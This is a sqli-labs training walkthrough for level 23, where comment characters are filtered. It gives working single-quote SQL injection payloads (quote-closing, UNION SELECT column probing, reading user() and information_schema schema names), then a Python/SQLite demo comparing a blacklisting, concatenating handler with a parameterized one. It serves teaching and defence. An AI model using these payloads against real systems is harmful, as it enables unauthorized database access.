Level 23:
This level is again a GET-based, string-type, single-quote, error-based SQL injection: entering ?id=1' makes the page return an error.
Following the same routine as before, we first enter ?id=1' or '1'='1
The page displays normally, which suggests there is a good chance of SQL injection here. Next we enter ?id=1' or '1'='1'%23 (%23 is the URL-encoded # comment character).
This time the page unexpectedly errors. The error message shows that our comment did not take effect: the backend filters comment characters.
So a comment cannot be used to cut off the rest of the SQL statement here; only the quote-closing method remains. One caveat: in a real test the number of columns in the table is unknown, and ORDER BY is not usable in this situation. ORDER BY normally sits at the end of the SQL statement, and once the closing single quote is appended after the ORDER BY clause, SQL effectively ignores the ORDER BY.
For example, if we enter ?id=1' order by and '1'='1
the query never errors, so ORDER BY cannot be used to determine the column count. We are left with trying a different approach.
Instead, we enter, in turn:
?id=1' union select '1
?id=1' union select 1,'1
?id=1' union select 1,1,'1
The first two produce an error and the last one does not, which tells us that the current query returns three columns.
Knowing that there are three columns, we go on to enter
?id=-1' union select 1,2,'3
As you can see, the data for columns 2 and 3 is displayed. Since the third column is needed to close the trailing single quote, we can only use the second column for our queries.
Enter ?id=-1' union select 1,user(),'3 to query the current user name.
Enter ?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3 to list the database names.
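The lesson of this level, from the defender's side, is that stripping comment characters does not close the hole: the quote-closing payloads above still work, because the input is still concatenated into the query. The following Python example (added here, not the lab's own PHP/MySQL code) models the two handlers side by side in SQLite: a concatenating handler behind an assumed blacklist that deletes # and --, and a parameterized handler. The users table, its rows, and the filter's exact behaviour are constructed for the example; it replays the page's own inputs and shows which ones the filtered handler still executes and why the parameterized one treats every one of them as a plain, non-matching id.

```python
import re
import sqlite3

# Constructed stand-in for the lab's users table (sqli-labs itself uses MySQL;
# SQLite keeps this runnable offline). Names and passwords are made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice-pass"), (2, "bob", "bob-pass")],
    )
    return conn


def strip_comments(value: str) -> str:
    """Assumed blacklist filter: delete '#' and '--' so a trailing comment cannot
    hide the rest of the query. This models the 'filter comment characters'
    behaviour the page describes; it is not the lab's source."""
    return re.sub(r"#|--", "", value)


def lookup_concat(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Vulnerable pattern: blacklist first, then concatenate into SQL.
    Returns the SQL that actually ran plus either the rows or the error text,
    which is exactly what the lab's page reveals to the visitor."""
    sql = f"SELECT * FROM users WHERE id='{strip_comments(raw_id)}' LIMIT 0,1"
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"sql": sql, "rows": [], "error": str(exc)}


def lookup_param(conn: sqlite3.Connection, raw_id: str) -> list:
    """Fixed pattern: the id is bound as a parameter, so a quote inside the input
    is data rather than SQL syntax. No comment blacklist is needed at all."""
    return conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (raw_id,)
    ).fetchall()


def compare(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Run one input through both handlers; handy when reviewing whether a
    filter change actually removed the vulnerability or only hid one symptom."""
    return {
        "input": raw_id,
        "concat": lookup_concat(conn, raw_id),
        "param": lookup_param(conn, raw_id),
    }


if __name__ == "__main__":
    db = make_db()
    # The page's own inputs, in the order the walkthrough tries them.
    for payload in [
        "1",
        "1' or '1'='1",
        "1' or '1'='1'#",
        "-1' union select 1,'1",
        "-1' union select 1,2,'3",
    ]:
        print(compare(db, payload))
```

Running it reproduces the walkthrough: the comment-terminated input fails only because the filter left an unbalanced quote behind, the two-column union fails on column count, and the three-column union returns the attacker-chosen row through the concatenating handler, while the parameterized handler returns nothing for every injected input and the real row only for the plain id. The fix is parameterization, not a longer blacklist.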
Sqli-labs (10): filtering comment characters